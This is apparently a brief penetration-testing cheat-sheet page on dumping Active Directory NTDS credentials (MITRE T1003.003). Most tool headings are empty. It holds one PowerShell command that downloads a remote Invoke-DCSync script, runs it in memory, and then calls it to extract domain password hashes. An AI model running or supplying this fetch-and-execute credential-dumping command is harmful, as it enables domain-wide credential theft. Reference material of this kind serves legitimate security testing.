NTDS
https://attack.mitre.org/techniques/T1003/003/
Techniques
Invoke-DCsync (PentestFactory)
# Load into memory
IEX(New-Object System.Net.WebClient).DownloadString("https://raw.githubusercontent.com/pentestfactory/Invoke-DCSync/main/Invoke-DCSync.ps1")
# Execute
Invoke-DCSync
Invoke-DCSync (S3cur3Th1sSh1t)

Metasploit

Mimikatz

ntdsutil.exe (Native)


Secretsdump.py


PsMapExec

Volume Shadow Copy

Last updated